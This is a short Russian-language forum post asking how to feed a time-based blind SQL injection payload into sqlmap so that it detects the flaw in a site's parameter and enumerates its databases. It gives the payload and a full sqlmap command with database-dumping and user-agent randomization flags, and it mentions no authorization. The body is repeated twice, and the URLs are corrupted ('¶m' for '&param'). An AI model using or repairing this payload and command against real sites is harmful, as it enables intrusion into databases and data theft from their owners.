Emince
16.09.2024, 17:27
Доброго времени суток!
Есть уязвимость в param1
https://site/index.php?param1=1¶m2=1¶m3=0¶m4=es¶m5=1
, payload выглядит так
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
.Sqlmap, в упор, не видит уязвимость в param1.
Пытался передать этот payload в sqlmap вот так
sqlmap.py -p param1 -u "https://site/index.php?param1=1¶m2=1¶m3=0¶m4=es¶m5=1 --dbs --random-agent --batch --suffix "0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z"
, ничего не вышло.
Прошу подсказать, как корректно передать указанный payload в sqlmap?
Есть уязвимость в param1
https://site/index.php?param1=1¶m2=1¶m3=0¶m4=es¶m5=1
, payload выглядит так
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
.Sqlmap, в упор, не видит уязвимость в param1.
Пытался передать этот payload в sqlmap вот так
sqlmap.py -p param1 -u "https://site/index.php?param1=1¶m2=1¶m3=0¶m4=es¶m5=1 --dbs --random-agent --batch --suffix "0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z"
, ничего не вышло.
Прошу подсказать, как корректно передать указанный payload в sqlmap?